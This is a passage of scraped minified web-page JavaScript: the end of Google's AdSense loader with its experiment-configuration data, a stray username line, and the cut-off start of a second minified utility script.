ads.");else{e=op(a.element);Io(e,b);c=U(w).head_tag_slot_vars||{};Sc(c,function(g,h){b.hasOwnProperty(h)||(b[h]=g)});if(e.hasAttribute("data-require-head")&&!U(w).head_tag_slot_vars)throw new T("AdSense head tag is missing. AdSense body tags don't work without the head tag. You can copy the head tag from your account on https://adsense.com."); if(!b.google_ad_client)throw new T("Ad client is missing from the slot.");b.google_apsail=dl(b.google_ad_client);var f=(c=0===(U(L).first_tag_on_page||0)&&Fl(b))&&Gl(c);c&&!f&&(np(c,d),U(L).skip_next_reactive_tag=!0);0===(U(L).first_tag_on_page||0)&&(U(L).first_tag_on_page=2);b.google_pause_ad_requests=!!U(L).pause_ad_requests;Vo(e,b,d);c&&f&&pp(c)}}}var qp=!1;function jp(a,b,c){P(Ye)&&!qp&&(qp=!0,a=lp(a)||qn(L),Yi("predictive_abg",{a_c:a,p_c:b,b_v:c},.01))} function lp(a){return a.google_ad_client?a.google_ad_client:(a=a.params)&&a.google_ad_client?a.google_ad_client:""}function mp(){if(P(Re)){var a=ul(L);if(!(a=a&&a.Fa)){try{var b=L.localStorage}catch(c){b=null}b=b?zj(b):null;a=!(b&&Ck(b)&&b)}a||vl(L,1)}}function pp(a){gd(function(){Uf(w).wasPlaTagProcessed||w.adsbygoogle&&w.adsbygoogle.push(a)})} function np(a,b){if(U(L).skip_next_reactive_tag)U(L).skip_next_reactive_tag=!1;else{0===(U(L).first_tag_on_page||0)&&(U(L).first_tag_on_page=1);if(a.tag_partner){var c=a.tag_partner,d=U(w);d.tag_partners=d.tag_partners||[];d.tag_partners.push(c)}U(L).ama_ran_on_page||Il(new Hl(a,b));cp(a,b)}} function op(a){if(a){if(!Uo(a)&&(a.id?a=Yo(a.id):a=null,!a))throw new T("'element' has already been filled.");if(!("innerHTML"in a))throw new T("'element' is not a good DOM element.");}else if(a=Yo(),!a)throw new T("All ins elements in the DOM with class=adsbygoogle already have ads in them.");return a} function rp(){var a=new Oj(L),b=new Oo(L),c=new Po(L),d=L.__cmp?1:0;a=Pj(a)?1:0;var e,f;(f="function"===typeof(null==(e=b.i)?void 0:e.__uspapi))||(b.h?b=b.h:(b.h=$c(b.i,"__uspapiLocator"),b=b.h),f=null!=b);c.l||(c.i||(c.i=c.h.googlefc?c.h:$c(c.h,"googlefcPresent")),c.l=!0);Yi("cmpMet",{tcfv1:d,tcfv2:a,usp:f?1:0,fc:c.i?1:0,ptt:9},Q(ye))}function sp(a){a={value:D(a,16)};var b=.01;Q(Te)&&(a.eid=Q(Te),b=1);a.frequency=b;Yi("new_abg_tag",a,b)}function tp(a){Dj().S[Fj(26)]=!!Number(a)} function up(a){Number(a)?U(L).pause_ad_requests=!0:(U(L).pause_ad_requests=!1,a=function(){if(!U(L).pause_ad_requests){var b=void 0===b?{}:b;if("function"===typeof window.CustomEvent)var c=new CustomEvent("adsbygoogle-pub-unpause-ad-requests-event",b);else c=document.createEvent("CustomEvent"),c.initCustomEvent("adsbygoogle-pub-unpause-ad-requests-event",!!b.bubbles,!!b.cancelable,b.detail);L.dispatchEvent(c)}},w.setTimeout(a,0),w.setTimeout(a,1E3))} function vp(a){Yi("adsenseGfpKnob",{value:a,ptt:9},.1);switch(a){case 0:case 2:a=!0;break;case 1:a=!1;break;default:throw Error("Illegal value of cookieOptions: "+a);}L._gfp_a_=a}function wp(a){a&&a.call&&"function"===typeof a&&window.setTimeout(a,0)} function hp(a,b){b=Dl(ec(hc(qc(b.sb).toString()),zf()?{bust:zf()}:{})).then(function(c){null==Qo&&(c.init(a),Qo=c,xp())});Zi(723,b);r(b,"finally").call(b,function(){Ro.length=0;Yi("slotcar",{event:"api_ld",time:Date.now()-Ia,time_pr:Date.now()-To})})} function xp(){for(var a=u(r(So,"keys").call(So)),b=a.next();!b.done;b=a.next()){b=b.value;var c=So.get(b);-1!==c&&(w.clearTimeout(c),So.delete(b))}a={};for(b=0;b<Ro.length;a={fa:a.fa,ba:a.ba},b++)So.has(b)||(a.ba=Ro[b],a.fa=ip(a.ba),Wi(723,function(d){return function(){3===d.fa?Qo.handleAdConfig(d.ba):2===d.fa&&Zi(730,Qo.handleAdBreakBeforeReady(d.ba))}}(a)))} function kp(a){var b=Ro.length;if(2===ip(a)&&"preroll"===a.type&&null!=a.adBreakDone){-1===To&&(To=Date.now());var c=w.setTimeout(function(){try{(0,a.adBreakDone)({breakType:"preroll",breakName:a.name,breakFormat:"preroll",breakStatus:"timeout"}),So.set(b,-1),Yi("slotcar",{event:"pr_to",source:"adsbygoogle"})}catch(d){console.error("[Ad Placement API] adBreakDone callback threw an error:",d instanceof Error?d:Error(String(d)))}},1E3*Q(kf));So.set(b,c)}} function yp(){if(P(Ne)&&!P(Me)){var a=L.document,b=a.createElement("LINK"),c=nd(Ml);if(c instanceof cc||c instanceof mc)b.href=sc(c);else{if(-1===tc.indexOf("stylesheet"))throw Error('TrustedResourceUrl href attribute required with rel="stylesheet"');b.href=rc(c)}b.rel="stylesheet";a.head.appendChild(b)}};(function(a,b,c,d){d=void 0===d?function(){}:d;Ui.Ua($i);Wi(166,function(){var e=sn(b);jn(I(e,2));Xk(D(e,6));d();kd(16,[1,e.toJSON()]);var f=md(ld(L))||L,g=c(kn({eb:a,nb:I(e,2)}),e);P(cf)&&al(f,e);om(f,e,null===L.document.currentScript?1:Ol(g.ub));Mo();if((!Na()||0<=Ka(Qa(),11))&&(null==(L.Prototype||{}).Version||!P(We))){Vi(P(qf));Go(e);ok();try{Mn()}catch(q){}Fo();fp(g,e);f=window;var h=f.adsbygoogle;if(!h||!h.loaded){if(P(Se)&&!D(e,16))try{if(L.document.querySelector('script[src*="/pagead/js/adsbygoogle.js?client="]'))return}catch(q){}yp(); sp(e);Q(ye)&&rp();var k={push:function(q){$o(q,g,e)},loaded:!0};try{Object.defineProperty(k,"requestNonPersonalizedAds",{set:tp}),Object.defineProperty(k,"pauseAdRequests",{set:up}),Object.defineProperty(k,"cookieOptions",{set:vp}),Object.defineProperty(k,"onload",{set:wp})}catch(q){}if(h)for(var l=u(["requestNonPersonalizedAds","pauseAdRequests","cookieOptions"]),m=l.next();!m.done;m=l.next())m=m.value,void 0!==h[m]&&(k[m]=h[m]);"_gfp_a_"in window||(window._gfp_a_=!0);Zo(h,g,e);f.adsbygoogle=k;h&& (k.onload=h.onload);(f=Bo(g))&&document.documentElement.appendChild(f)}}})})("m202204040101",rn,function(a,b){var c=2012<C(b,1,0)?"_fy"+C(b,1,0):"",d=I(b,3),e=I(b,2);b=nd(dn,a,c);d=nd(en,e,d);return{sb:b,qb:nd(fn,a,c),ob:nd(gn,a,c),pb:nd(hn,a,c),vb:d,ub:/^(?:https?:)?\/\/(?:pagead2\.googlesyndication\.com|securepubads\.g\.doubleclick\.net)\/pagead\/(?:js\/)?(?:show_ads|adsbygoogle)\.js(?:[?#].*)?$/}}); }).call(this,"[2019,\"r20220406\",\"r20190131\",null,null,null,null,\".google.co.uz\",null,null,null,[[[1082,null,null,[1]],[null,62,null,[null,0.001]],[383,null,null,[1]],[null,1130,null,[null,100]],[null,1126,null,[null,5000]],[1132,null,null,[1]],[1131,null,null,[1]],[null,1142,null,[null,2]],[null,1165,null,[null,1000]],[null,1114,null,[null,1]],[null,1116,null,[null,300]],[null,1117,null,[null,100]],[null,1115,null,[null,1]],[null,1159,null,[null,500]],[1145,null,null,[1]],[1021,null,null,[1]],[null,66,null,[null,-1]],[null,65,null,[null,-1]],[1087,null,null,[1]],[1053,null,null,[1]],[1100,null,null,[1]],[1102,null,null,[1]],[1149,null,null,[1]],[null,1072,null,[null,0.75]],[1101,null,null,[1]],[1036,null,null,[1]],[null,1085,null,[null,5]],[null,63,null,[null,30]],[null,1080,null,[null,5]],[1054,null,null,[1]],[null,1027,null,[null,10]],[null,57,null,[null,120]],[null,1079,null,[null,5]],[null,1050,null,[null,30]],[null,58,null,[null,120]],[381914117,null,null,[1]],[null,null,null,[null,null,null,[\"A8FHS1NmdCwGqD9DwOicnHHY+y27kdWfxKa0YHSGDfv0CSpDKRHTQdQmZVPDUdaFWUsxdgVxlwAd6o+dhJykPA0AAACWeyJvcmlnaW4iOiJodHRwczovL2RvdWJsZWNsaWNrLm5ldDo0NDMiLCJmZWF0dXJlIjoiQ29udmVyc2lvbk1lYXN1cmVtZW50IiwiZXhwaXJ5IjoxNjQzMTU1MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZSwiaXNUaGlyZFBhcnR5Ijp0cnVlLCJ1c2FnZSI6InN1YnNldCJ9\",\"A8zdXi6dr1hwXEUjQrYiyYQGlU3557y5QWDnN0Lwgj9ePt66XMEvNkVWOEOWPd7TP9sBQ25X0Q15Lr1Nn4oGFQkAAACceyJvcmlnaW4iOiJodHRwczovL2dvb2dsZXN5bmRpY2F0aW9uLmNvbTo0NDMiLCJmZWF0dXJlIjoiQ29udmVyc2lvbk1lYXN1cmVtZW50IiwiZXhwaXJ5IjoxNjQzMTU1MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZSwiaXNUaGlyZFBhcnR5Ijp0cnVlLCJ1c2FnZSI6InN1YnNldCJ9\",\"A4\/Htern2udN9w3yJK9QgWQxQFruxOXsXL7cW60DyCl0EZFGCSme\/J33Q\/WzF7bBkVvhEWDlcBiUyZaim5CpFQwAAACceyJvcmlnaW4iOiJodHRwczovL2dvb2dsZXRhZ3NlcnZpY2VzLmNvbTo0NDMiLCJmZWF0dXJlIjoiQ29udmVyc2lvbk1lYXN1cmVtZW50IiwiZXhwaXJ5IjoxNjQzMTU1MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZSwiaXNUaGlyZFBhcnR5Ijp0cnVlLCJ1c2FnZSI6InN1YnNldCJ9\"]],null,1934],[1953,null,null,[1]],[1947,null,null,[1]],[434462125,null,null,[1]],[1938,null,null,[1]],[1948,null,null,[1]],[392736476,null,null,[1]],[null,null,null,[null,null,null,[\"AxujKG9INjsZ8\/gUq8+dTruNvk7RjZQ1oFhhgQbcTJKDnZfbzSTE81wvC2Hzaf3TW4avA76LTZEMdiedF1vIbA4AAABueyJvcmlnaW4iOiJodHRwczovL2ltYXNkay5nb29nbGVhcGlzLmNvbTo0NDMiLCJmZWF0dXJlIjoiVHJ1c3RUb2tlbnMiLCJleHBpcnkiOjE2NTI3NzQ0MDAsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=\",\"Azuce85ORtSnWe1MZDTv68qpaW3iHyfL9YbLRy0cwcCZwVnePnOmkUJlG8HGikmOwhZU22dElCcfrfX2HhrBPAkAAAB7eyJvcmlnaW4iOiJodHRwczovL2RvdWJsZWNsaWNrLm5ldDo0NDMiLCJmZWF0dXJlIjoiVHJ1c3RUb2tlbnMiLCJleHBpcnkiOjE2NTI3NzQ0MDAsImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9\",\"A16nvcdeoOAqrJcmjLRpl1I6f3McDD8EfofAYTt\/P\/H4\/AWwB99nxiPp6kA0fXoiZav908Z8etuL16laFPUdfQsAAACBeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZXRhZ3NlcnZpY2VzLmNvbTo0NDMiLCJmZWF0dXJlIjoiVHJ1c3RUb2tlbnMiLCJleHBpcnkiOjE2NTI3NzQ0MDAsImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9\",\"AxBHdr0J44vFBQtZUqX9sjiqf5yWZ\/OcHRcRMN3H9TH+t90V\/j3ENW6C8+igBZFXMJ7G3Pr8Dd13632aLng42wgAAACBeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZXN5bmRpY2F0aW9uLmNvbTo0NDMiLCJmZWF0dXJlIjoiVHJ1c3RUb2tlbnMiLCJleHBpcnkiOjE2NTI3NzQ0MDAsImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9\",\"A88BWHFjcawUfKU3lIejLoryXoyjooBXLgWmGh+hNcqMK44cugvsI5YZbNarYvi3roc1fYbHA1AVbhAtuHZflgEAAAB2eyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IlRydXN0VG9rZW5zIiwiZXhwaXJ5IjoxNjUyNzc0NDAwLCJpc1N1YmRvbWFpbiI6dHJ1ZSwiaXNUaGlyZFBhcnR5Ijp0cnVlfQ==\"]],null,1932],[null,397907552,null,[null,500]],[432938498,null,null,[1]]],[[10,[[1,[[21066108],[21066109,[[316,null,null,[1]]]]],null,null,null,34,18,1],[1,[[21066110],[21066111]],null,null,null,34,18,1],[1,[[42530528],[42530529,[[368,null,null,[1]]]],[42530530,[[369,null,null,[1]],[368,null,null,[1]]]]]],[1,[[42531496],[42531497,[[1161,null,null,[1]]]]]],[1,[[42531513],[42531514,[[316,null,null,[1]]]]]],[1,[[44719338],[44719339,[[334,null,null,[1]],[null,54,null,[null,100]],[null,66,null,[null,10]],[null,65,null,[null,1000]]]]]],[200,[[44760474],[44760475,[[1129,null,null,[1]]]]]],[10,[[44760911],[44760912,[[1160,null,null,[1]]]]]],[100,[[44761043],[44761044]]],[1,[[44752536,[[1122,null,null,[1]],[1033,null,null,[1]]]],[44753656]]],[null,[[44755592],[44755593,[[1122,null,null,[1]],[1033,null,null,[1]]]],[44755594,[[1122,null,null,[1]],[1033,null,null,[1]]]],[44755653,[[1122,null,null,[1]],[1033,null,null,[1]]]]]],[10,[[44762453],[44762454,[[1122,null,null,[1]],[1033,null,null,[1]]]]]],[20,[[182982000,[[218,null,null,[1]]],[1,[[12,null,null,null,2,null,\"\\\\.wiki(dogs|how)(-fun)?\\\\.\"]]]],[182982100,[[217,null,null,[1]]],[1,[[12,null,null,null,2,null,\"\\\\.wiki(dogs|how)(-fun)?\\\\.\"]]]]],null,null,null,36,8,1],[20,[[182982200,null,[1,[[12,null,null,null,2,null,\"\\\\.wiki(dogs|how)(-fun)?\\\\.\"]]]],[182982300,null,[1,[[12,null,null,null,2,null,\"\\\\.wiki(dogs|how)(-fun)?\\\\.\"]]]]],null,null,null,36,8,1],[10,[[182984000,null,[4,null,23,null,null,null,null,[\"1\"]]],[182984100,[[218,null,null,[1]]],[4,null,23,null,null,null,null,[\"1\"]]]],null,null,null,36,10,101],[10,[[182984200,null,[4,null,23,null,null,null,null,[\"1\"]]],[182984300,null,[4,null,23,null,null,null,null,[\"1\"]]]],null,null,null,36,10,101],[10,[[21066428],[21066429]]],[10,[[21066430],[21066431],[21066432],[21066433]],null,null,null,44,22],[10,[[21066434],[21066435]],null,null,null,44,null,500],[10,[[31065342],[31065343,[[1147,null,null,[1]]]]]],[50,[[31065544],[31065545,[[1154,null,null,[1]]]]]],[50,[[31065741],[31065742,[[1134,null,null,[1]]]]]],[1,[[31065944,[[null,1103,null,[null,31065944]],[1121,null,null,[1]],[null,1119,null,[null,300]]]],[31065945,[[null,1103,null,[null,31065945]],[1121,null,null,[1]],[1143,null,null,[1]],[null,1119,null,[null,300]]]],[31065946,[[null,1103,null,[null,31065946]],[1121,null,null,[1]],[null,1119,null,[null,300]],[1120,null,null,[1]]]],[31065950,[[null,1103,null,[null,31065950]],[null,1114,null,[null,0.9]],[null,1112,null,[null,5]],[null,1113,null,[null,5]],[null,1104,null,[null,100]],[null,1115,null,[null,0.8]],[1121,null,null,[1]],[null,1119,null,[null,300]],[1120,null,null,[1]]]],[31065951,[[null,1103,null,[null,31065951]],[null,1114,null,[null,0.9]],[null,1110,null,[null,1]],[null,1104,null,[null,100]],[null,1115,null,[null,0.8]],[1121,null,null,[1]],[null,1119,null,[null,300]],[1120,null,null,[1]]]],[31065952,[[null,1103,null,[null,31065952]],[null,1114,null,[null,0.9]],[null,1110,null,[null,5]],[null,1104,null,[null,100]],[null,1115,null,[null,0.8]],[1121,null,null,[1]],[null,1119,null,[null,300]],[1120,null,null,[1]]]],[31065953,[[null,1103,null,[null,31065953]],[null,1114,null,[null,0.9]],[null,1110,null,[null,5]],[null,1111,null,[null,5]],[null,1112,null,[null,5]],[null,1113,null,[null,5]],[null,1104,null,[null,100]],[null,1115,null,[null,0.8]],[1121,null,null,[1]],[null,1119,null,[null,300]],[1120,null,null,[1]]]],[44762492,[[null,1103,null,[null,44762492]],[null,1114,null,[null,0.9]],[null,1104,null,[null,100]],[null,1106,null,[null,10]],[null,1107,null,[null,10]],[null,1105,null,[null,10]],[null,1115,null,[null,-1]],[1121,null,null,[1]],[null,1119,null,[null,300]],[1120,null,null,[1]]]]],[6,null,null,3,null,2],49],[1,[[31066496,[[null,1103,null,[null,31066496]],[1121,null,null,[1]],[null,1119,null,[null,300]]]],[31066497,[[null,1158,null,[null,45]],[null,1157,null,[null,400]],[null,1103,null,[null,31066497]],[null,1114,null,[null,-1]],[null,1104,null,[null,100]],[null,1106,null,[null,10]],[null,1107,null,[null,10]],[null,1105,null,[null,10]],[null,1115,null,[null,-1]],[1121,null,null,[1]],[null,1119,null,[null,300]],[1162,null,null,[1]],[1155,null,null,[1]],[1120,null,null,[1]]]]],null,49],[1000,[[31067051,[[null,null,14,[null,null,\"31067051\"]]],[6,null,null,null,6,null,\"31067051\"]],[31067052,[[null,null,14,[null,null,\"31067052\"]]],[6,null,null,null,6,null,\"31067052\"]]],[4,null,55]],[1000,[[31067063,[[null,null,14,[null,null,\"31067063\"]]],[6,null,null,null,6,null,\"31067063\"]],[31067064,[[null,null,14,[null,null,\"31067064\"]]],[6,null,null,null,6,null,\"31067064\"]]],[4,null,55]],[10,[[31067067],[31067068,[[1148,null,null,[1]]]]]],[1000,[[31067083,[[null,null,14,[null,null,\"31067083\"]]],[6,null,null,null,6,null,\"31067083\"]],[31067084,[[null,null,14,[null,null,\"31067084\"]]],[6,null,null,null,6,null,\"31067084\"]]],[4,null,55]],[1,[[44736076],[44736077,[[null,1046,null,[null,0.1]]]]]],[1,[[44761631,[[null,1103,null,[null,44761631]]]],[44761632,[[null,1103,null,[null,44761632]],[1143,null,null,[1]]]],[44761633,[[null,1142,null,[null,2]],[null,1103,null,[null,44761633]],[null,1119,null,[null,300]],[1120,null,null,[1]]]],[44761634,[[null,1142,null,[null,2]],[null,1103,null,[null,44761634]],[null,1114,null,[null,0.9]],[null,1104,null,[null,100]],[null,1115,null,[null,0.8]],[null,1119,null,[null,300]],[1120,null,null,[1]]]],[44761635,[[null,1142,null,[null,2]],[null,1103,null,[null,44761635]],[null,1114,null,[null,0.9]],[null,1106,null,[null,10]],[null,1115,null,[null,0.8]],[null,1119,null,[null,300]],[1120,null,null,[1]]]],[44761636,[[null,1142,null,[null,2]],[null,1103,null,[null,44761636]],[null,1114,null,[null,0.9]],[null,1107,null,[null,10]],[null,1115,null,[null,0.8]],[null,1119,null,[null,300]],[1120,null,null,[1]]]],[44761637,[[null,1142,null,[null,2]],[null,1103,null,[null,44761637]],[null,1114,null,[null,0.9]],[null,1105,null,[null,10]],[null,1115,null,[null,0.8]],[null,1119,null,[null,300]],[1120,null,null,[1]]]],[44762110,[[null,1142,null,[null,2]],[null,1103,null,[null,44762110]],[null,1114,null,[null,0.9]],[null,1104,null,[null,100]],[null,1115,null,[null,-1]],[null,1119,null,[null,300]],[1120,null,null,[1]]]]],[6,null,null,3,null,2],49],[500,[[44761838,[[null,1142,null,[null,2]],[null,1103,null,[null,44761838]],[null,1114,null,[null,0.9]],[null,1104,null,[null,100]],[null,1115,null,[null,-1]],[null,1119,null,[null,300]],[1120,null,null,[1]]]]],[2,[[6,null,null,3,null,2],[12,null,null,null,2,null,\"smitmehta\\\\.com\/\"]]],49],[null,[[44762338],[44762339,[[380254521,null,null,[1]]]]],[1,[[4,null,63]]],null,null,56],[150,[[31061760],[31063913,[[null,1126,null,[null,5000],[[[12,null,null,null,4,null,\"Android\",[\"navigator.userAgent\"]],[null,5500]]]],[null,1032,null,[null,200],[[[12,null,null,null,4,null,\"Android\",[\"navigator.userAgent\"]],[null,500]]]]]],[31065341,[[1150,null,null,[1]],[null,1126,null,[null,5000],[[[12,null,null,null,4,null,\"Android\",[\"navigator.userAgent\"]],[null,5500]]]],[null,1032,null,[null,200],[[[12,null,null,null,4,null,\"Android\",[\"navigator.userAgent\"]],[null,500]]]]]]],[3,[[4,null,8,null,null,null,null,[\"gmaSdk.getQueryInfo\"]],[4,null,8,null,null,null,null,[\"webkit.messageHandlers.getGmaQueryInfo.postMessage\"]],[4,null,8,null,null,null,null,[\"webkit.messageHandlers.getGmaSig.postMessage\"]]]],15],[50,[[31061761,[[null,1126,null,[null,5000],[[[12,null,null,null,4,null,\"Android\",[\"navigator.userAgent\"]],[null,5500]]]],[null,1032,null,[null,200],[[[12,null,null,null,4,null,\"Android\",[\"navigator.userAgent\"]],[null,500]]]]]],[31062202,[[null,1126,null,[null,5000],[[[12,null,null,null,4,null,\"Android\",[\"navigator.userAgent\"]],[null,5500]]]],[null,1032,null,[null,200],[[[12,null,null,null,4,null,\"Android\",[\"navigator.userAgent\"]],[null,500]]]]]],[31063912],[44756455,[[null,1126,null,[null,5000],[[[12,null,null,null,4,null,\"Android\",[\"navigator.userAgent\"]],[null,5500]]]],[null,1032,null,[null,200],[[[12,null,null,null,4,null,\"Android\",[\"navigator.userAgent\"]],[null,500]]]]]]],[3,[[4,null,8,null,null,null,null,[\"gmaSdk.getQueryInfo\"]],[4,null,8,null,null,null,null,[\"webkit.messageHandlers.getGmaQueryInfo.postMessage\"]],[4,null,8,null,null,null,null,[\"webkit.messageHandlers.getGmaSig.postMessage\"]]]],15],[null,[[31063202,[[null,1126,null,[null,5000],[[[12,null,null,null,4,null,\"Android\",[\"navigator.userAgent\"]],[null,5500]]]],[null,1032,null,[null,200],[[[12,null,null,null,4,null,\"Android\",[\"navigator.userAgent\"]],[null,500]]]]]]],[3,[[4,null,8,null,null,null,null,[\"gmaSdk.getQueryInfo\"]],[4,null,8,null,null,null,null,[\"webkit.messageHandlers.getGmaQueryInfo.postMessage\"]],[4,null,8,null,null,null,null,[\"webkit.messageHandlers.getGmaSig.postMessage\"]]]],15],[null,[[44753753,[[null,1126,null,[null,5000],[[[12,null,null,null,4,null,\"Android\",[\"navigator.userAgent\"]],[null,5500]]]],[null,1032,null,[null,200],[[[12,null,null,null,4,null,\"Android\",[\"navigator.userAgent\"]],[null,500]]]]]]],[3,[[4,null,8,null,null,null,null,[\"gmaSdk.getQueryInfo\"]],[4,null,8,null,null,null,null,[\"webkit.messageHandlers.getGmaQueryInfo.postMessage\"]],[4,null,8,null,null,null,null,[\"webkit.messageHandlers.getGmaSig.postMessage\"]]]],15]]],[20,[[50,[[31062930],[31062931,[[380025941,null,null,[1]]]]],null,null,null,null,null,101,null,102]]],[13,[[10,[[44759847],[44759848,[[1947,null,null,[]]]]]],[10,[[44759849],[44759850]]],[1,[[31065824],[31065825,[[424117738,null,null,[1]]]]]],[10,[[31066184],[31066185,[[436251930,null,null,[1]]]]]],[1000,[[21067496]],[4,null,9,null,null,null,null,[\"document.hasTrustToken\"]]],[1000,[[31060475,null,[2,[[1,[[4,null,9,null,null,null,null,[\"window.PeriodicSyncManager\"]]]],[12,null,null,null,4,null,\"Android\",[\"navigator.userAgent\"]]]]]]],[500,[[31061692],[31061693,[[77,null,null,[1]],[78,null,null,[1]],[85,null,null,[1]],[80,null,null,[1]],[76,null,null,[1]]]]],[4,null,6,null,null,null,null,[\"31061691\"]]],[1,[[31062890],[31062891,[[397841828,null,null,[1]]]]]],[1,[[31062946]],[4,null,27,null,null,null,null,[\"document.prerendering\"]]],[1,[[31062947]],[1,[[4,null,27,null,null,null,null,[\"document.prerendering\"]]]]],[50,[[31064018],[31064019,[[1961,null,null,[1]]]]]],[1,[[31065981,null,[2,[[6,null,null,3,null,0],[12,null,null,null,4,null,\"Chrome\/(9[23456789]|\\\\d{3,})\",[\"navigator.userAgent\"]],[4,null,27,null,null,null,null,[\"crossOriginIsolated\"]]]]]]]]],[11,[[10,[[44760494],[44760495,[[1957,null,null,[1]]]]],null,48],[1,[[44760496],[44760497,[[1957,null,null,[1]]]],[44760498,[[1957,null,null,[1]]]]],null,48],[2,[[44761535],[44761536,[[1957,null,null,[1]],[1963,null,null,[1]]]],[44761537,[[1957,null,null,[1]],[1964,null,null,[1]]]],[44761538,[[1957,null,null,[1]],[1965,null,null,[1]]]],[44761539,[[1957,null,null,[1]]]]],null,48]]],[17,[[10,[[31060047]],null,null,null,44,null,900],[10,[[31060048],[31060049]],null,null,null,null,null,null,null,101],[10,[[31060566]]]]],[12,[[50,[[31061828],[31061829,[[null,1126,null,[null,5000],[[[12,null,null,null,4,null,\"Android\",[\"navigator.userAgent\"]],[null,5500]]]],[null,1032,null,[null,200],[[[12,null,null,null,4,null,\"Android\",[\"navigator.userAgent\"]],[null,500]]]],[360245597,null,null,[1]],[null,494,null,[null,5000],[[[12,null,null,null,4,null,\"Android\",[\"navigator.userAgent\"]],[null,5500]]]]]],[31065659,[[1150,null,null,[1]],[null,1126,null,[null,5000],[[[12,null,null,null,4,null,\"Android\",[\"navigator.userAgent\"]],[null,5500]]]],[null,1032,null,[null,10000]],[427841102,null,null,[1]],[360245597,null,null,[1]],[null,494,null,[null,5000],[[[12,null,null,null,4,null,\"Android\",[\"navigator.userAgent\"]],[null,5500]]]]]],[31065787]],null,15],[20,[[21065724],[21065725,[[203,null,null,[1]]]]],[4,null,9,null,null,null,null,[\"LayoutShift\"]]],[50,[[31060006,null,[2,[[12,null,null,null,4,null,\"Android\",[\"navigator.userAgent\"]],[12,null,null,null,4,null,\"Chrome\/(89|9\\\\d|\\\\d{3,})\",[\"navigator.userAgent\"]],[4,null,9,null,null,null,null,[\"window.PeriodicSyncManager\"]]]]],[31060007,[[1928,null,null,[1]]],[2,[[12,null,null,null,4,null,\"Android\",[\"navigator.userAgent\"]],[12,null,null,null,4,null,\"Chrome\/(89|9\\\\d|\\\\d{3,})\",[\"navigator.userAgent\"]],[4,null,9,null,null,null,null,[\"window.PeriodicSyncManager\"]]]]]],null,21],[10,[[31060032],[31060033,[[1928,null,null,[1]]]]],null,21],[10,[[31061690],[31061691,[[83,null,null,[1]],[84,null,null,[1]]]]]],[1,[[31065721],[31065722,[[432946749,null,null,[1]]]]]]]]],null,null,[0.001,\"1000\",1,\"1000\"]],[null,[]],null,null,1,\"github.com\",309779023,[44759876,44759927,44759842]]");
drissi1990
(function(){var l;function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}function ba(a){var b="undefined"!=typeof Symbol&&Symbol.iterator&&a[Symbol.iterator];return b?b.call(a):{next:aa(a)}}function ca(a){if(!(a instanceof Array)){a=ba(a);for(var b,c=[];!(b=a.next()).done;)c.push(b.value);a=c}return a}var da="function"==typeof Object.create?Object.create:function(a){function b(){}b.prototype=a;return new b},ea;if("function"==typeof Object.setPrototypeOf)ea=Object.setPrototypeOf;else{var fa;a:{var ha={Ea:!0},ia={};try{ia.__proto__=ha;fa=ia.Ea;break a}catch(a){}fa=!1}ea=fa?function(a,b){a.__proto__=b;if(a.__proto__!==b)throw new TypeError(a+" is not extensible");return a}:null}var ja=ea;function ka(a,b){a.prototype=da(b.prototype);a.prototype.constructor=a;if(ja)ja(a,b);else for(var c in b)if("prototype"!=c)if(Object.defineProperties){var d=Object.getOwnPropertyDescriptor(b,c);d&&Object.defineProperty(a,c,d)}else a[c]=b[c]}var la="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){a!=Array.prototype&&a!=Object.prototype&&(a[b]=c.value)},ma="undefined"!=typeof window&&window===this?this:"undefined"!=typeof global&&null!=global?global:this;function na(a,b){if(b){var c=ma;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];e in c||(c[e]={});c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&la(c,a,{configurable:!0,writable:!0,value:b})}}na("String.prototype.endsWith",function(a){return a?a:function(b,c){if(null==this)throw new TypeError("The 'this' value for String.prototype.endsWith must not be null or undefined");if(b instanceof RegExp)throw new TypeError("First argument to String.prototype.endsWith must not be a regular expression");void 0===c&&(c=this.length);c=Math.max(0,Math.min(c|0,this.length));for(var d=b.length;0<d&&0<c;)if(this[--c]!=b[--d])return!1;return 0>=d}});na("Array.prototype.find",function(a){return a?a:function(b,c){a:{var d=this;d instanceof String&&(d=String(d));for(var e=d.length,f=0;f<e;f++){var g=d[f];if(b.call(c,g,f,d)){b=g;break a}}b=void 0}return b}});var oa="function"==typeof Object.assign?Object.assign:function(a,b){for(var c=1;c<arguments.length;c++){var d=arguments[c];if(d)for(var e in d)Object.prototype.hasOwnProperty.call(d,e)&&(a[e]=d[e])}return a};na("Object.assign",function(a){return a||oa});var p=this||self;function q(a){return"string"==typeof a}function pa(a){return"number"==typeof a}function qa(){if(null===ra)a:{var a=p.document;if((a=a.querySelector&&a.querySelector("script[nonce]"))&&(a=a.nonce||a.getAttribute("nonce"))&&sa.test(a)){ra=a;break a}ra=""}return ra}var sa=/^[\w+/_-]+[=]{0,2}$/,ra=null;function ta(a){a=a.split(".");for(var b=p,c=0;c<a.length;c++)if(b=b[a[c]],null==b)return null;return b}function ua(){}function va(a){a.ga=void 0;a.j=function(){return a.ga?a.ga:a.ga=new a}}function wa(a){var b=typeof a;if("object"==b)if(a){if(a instanceof Array)return"array";if(a instanceof Object)return b;var c=Object.prototype.toString.call(a);if("[object Window]"==c)return"object";if("[object Array]"==c||"number"==typeof a.length&&"undefined"!=typeof a.splice&&"undefined"!=typeof a.propertyIsEnumerable&&!a.propertyIsEnumerable("splice"))return"array";if("[object Function]"==c||"undefined"!=typeof a.call&&"undefined"!=typeof a.propertyIsEnumerable&&!a.propertyIsEnumerable("call"))return"function"}else return"null";else if("function"==b&&"undefined"==typeof a.call)return"object";return b}function xa(a){return null===a}function ya(a){return"array"==wa(a)}function za(a){var 